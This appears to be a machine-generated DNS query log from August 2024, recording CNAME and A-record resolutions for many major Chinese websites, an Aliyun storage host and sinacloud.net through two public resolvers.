                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.245A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.243A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.204A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.242A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.239A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.240A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)www.hupu.comwww.hupu.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)www.hupu.com.cdn.dnsv1.comdc3ee476.ovslegodl-dk.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.81.173A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.143.134A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.81.194A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.9A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.143.159A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.185A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.188A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.80.175A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.27.8A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.175.139.72A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.80.77A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.139A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.81.100A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.483867884 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.80.158A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.495548964 CEST114.114.114.114192.168.2.60x100No error (0)www.cctv.comwww.cctv.com.wsglb0.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.495548964 CEST114.114.114.114192.168.2.60x100No error (0)www.cctv.com.wsglb0.com163.171.208.133A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.495548964 CEST114.114.114.114192.168.2.60x100No error (0)www.cctv.com.wsglb0.com138.113.115.36A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.503104925 CEST8.8.8.8192.168.2.60x100No error (0)xianggangcs.oss-accelerate.aliyuncs.comds-2085.oss-acc-allline.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.503104925 CEST8.8.8.8192.168.2.60x100No error (0)ds-2085.oss-acc-allline.aliyuncs.comds-2085.oss-acc-allline.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.503104925 CEST8.8.8.8192.168.2.60x100No error (0)ds-2085.oss-acc-allline.aliyuncs.com.gds.alibabadns.comeu-central-1-ds-2085.oss-acc.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.503104925 CEST8.8.8.8192.168.2.60x100No error (0)eu-central-1-ds-2085.oss-acc.aliyuncs.com47.254.187.183A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)www.jb51.netca38c0f2.jiasula.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)ca38c0f2.jiasula.vipg8450a5.usallient81.jiasula.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.250A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.240A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.247A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.249A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.241A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.252A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.244A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.237A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.251A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.248A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.517968893 CEST114.114.114.114192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.253A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.562191010 CEST8.8.8.8192.168.2.60x100No error (0)www.cctv.comwww.cctv.com.wsglb0.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.562191010 CEST8.8.8.8192.168.2.60x100No error (0)www.cctv.com.wsglb0.com163.171.128.148A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.562191010 CEST8.8.8.8192.168.2.60x100No error (0)www.cctv.com.wsglb0.com138.113.147.185A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)www.autohome.com.cnwww.autohome.com.cn.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)www.autohome.com.cn.a.bdydns.comopencdnqczjv6.jomodns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com60.221.222.1A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com123.6.28.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com113.1.1.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com116.95.27.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com122.143.8.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com221.204.49.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com101.72.199.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com211.97.83.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com222.141.4.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.616939068 CEST114.114.114.114192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com116.177.239.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)www.jb51.netca38c0f2.jiasula.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)ca38c0f2.jiasula.vipg8450a5.usallient81.jiasula.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.252A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.248A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.247A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.244A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.237A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.250A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.241A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.249A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.251A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.253A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.650818110 CEST8.8.8.8192.168.2.60x100No error (0)g8450a5.usallient81.jiasula.vip45.194.34.240A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.659220934 CEST114.114.114.114192.168.2.60x100No error (0)xianggangcs.oss-accelerate.aliyuncs.comds-2085.oss-acc-allline.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.659220934 CEST114.114.114.114192.168.2.60x100No error (0)ds-2085.oss-acc-allline.aliyuncs.comds-2085.oss-acc-allline.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.659220934 CEST114.114.114.114192.168.2.60x100No error (0)ds-2085.oss-acc-allline.aliyuncs.com.gds.alibabadns.comap-southeast-1-ds-2085.oss-acc.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.659220934 CEST114.114.114.114192.168.2.60x100No error (0)ap-southeast-1-ds-2085.oss-acc.aliyuncs.com161.117.242.89A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)www.hupu.comwww.hupu.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)www.hupu.com.cdn.dnsv1.comdc3ee476.ovslegodl-dk.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.242A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.251A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.196A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.200A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.186.122A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.186.117A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.245A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.718739986 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.186.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.814834118 CEST114.114.114.114192.168.2.60x100No error (0)www.zhihu.comwww.zhihu.com.dsa.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.814834118 CEST114.114.114.114192.168.2.60x100No error (0)www.zhihu.com.dsa.dnsv1.combxjbqj09.e0.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.814834118 CEST114.114.114.114192.168.2.60x100No error (0)bxjbqj09.e0.sched.ovscdns.com43.159.71.118A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.814834118 CEST114.114.114.114192.168.2.60x100No error (0)bxjbqj09.e0.sched.ovscdns.com43.159.70.125A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)www.autohome.com.cnwww.autohome.com.cn.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)www.autohome.com.cn.a.bdydns.comopencdnqczjv6.jomodns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com119.188.176.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com221.204.61.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com101.72.249.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com218.60.173.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com218.60.172.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com150.138.157.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com112.65.203.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com101.72.199.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com101.72.203.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.871696949 CEST8.8.8.8192.168.2.60x100No error (0)opencdnqczjv6.jomodns.com121.22.239.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.932070971 CEST8.8.8.8192.168.2.60x100No error (0)www.cdstm.cnwww.cdstm.cn.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.932070971 CEST8.8.8.8192.168.2.60x100No error (0)www.cdstm.cn.a.bdydns.comopencdnka.jomodns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.932070971 CEST8.8.8.8192.168.2.60x100No error (0)opencdnka.jomodns.com113.219.142.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:18.279093981 CEST8.8.8.8192.168.2.60x100No error (0)www.zhihu.comwww.zhihu.com.dsa.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:18.279093981 CEST8.8.8.8192.168.2.60x100No error (0)www.zhihu.com.dsa.dnsv1.combxjbqj09.e0.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:18.279093981 CEST8.8.8.8192.168.2.60x100No error (0)bxjbqj09.e0.sched.ovscdns.com43.152.186.108A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:18.279093981 CEST8.8.8.8192.168.2.60x100No error (0)bxjbqj09.e0.sched.ovscdns.com43.152.29.38A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:19.101433039 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:19.101433039 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:19.551579952 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:19.551579952 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:20.189661980 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:20.189661980 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:20.537097931 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:20.537097931 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:34.074068069 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:34.074068069 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:34.094791889 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:34.094791889 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.749248981 CEST8.8.8.8192.168.2.60x100No error (0)www.kuaishou.commulti-az-www-api.kuaishou.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.749248981 CEST8.8.8.8192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.107.217.26A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.749248981 CEST8.8.8.8192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.102.202.106A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.749248981 CEST8.8.8.8192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.102.202.144A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.749248981 CEST8.8.8.8192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.102.202.125A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.926423073 CEST8.8.8.8192.168.2.60x100No error (0)www.sogou.com119.28.109.132A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.979127884 CEST114.114.114.114192.168.2.60x100No error (0)www.kuaishou.commulti-az-www-api.kuaishou.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.979127884 CEST114.114.114.114192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.102.202.144A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.979127884 CEST114.114.114.114192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.102.202.106A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.979127884 CEST114.114.114.114192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.102.202.125A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.979127884 CEST114.114.114.114192.168.2.60x100No error (0)multi-az-www-api.kuaishou.com103.107.217.26A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.comwww.douyin.com.bytedns1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.bytedns1.comwww.douyin.com.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.w.kunluncan.comwww.douyin.com.queniuyk.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.237A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.239A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.240A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.236A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.242A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.241A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.996315956 CEST114.114.114.114192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.160.238A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.081617117 CEST8.8.8.8192.168.2.60x100No error (0)www.iqiyi.comwww.iqiyiweb.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.105144978 CEST114.114.114.114192.168.2.60x100No error (0)www.sohu.comwww.sohu.com.dsa.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.105144978 CEST114.114.114.114192.168.2.60x100No error (0)www.sohu.com.dsa.dnsv1.comqt0t6l4k.e0.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.105144978 CEST114.114.114.114192.168.2.60x100No error (0)qt0t6l4k.e0.sched.ovscdns.com43.159.71.118A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.105144978 CEST114.114.114.114192.168.2.60x100No error (0)qt0t6l4k.e0.sched.ovscdns.com43.159.70.125A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.121345997 CEST114.114.114.114192.168.2.60x100No error (0)www.iqiyi.comwww.iqiyiweb.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.142546892 CEST8.8.8.8192.168.2.60x100No error (0)www.qq.comwww.qq.com.eo.dnse2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.142546892 CEST8.8.8.8192.168.2.60x100No error (0)www.qq.com.eo.dnse2.com43.152.186.103A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)www.sina.com.cnspool.grid.sinaedge.comCNAME (Canonical name)IN (0x0001)false
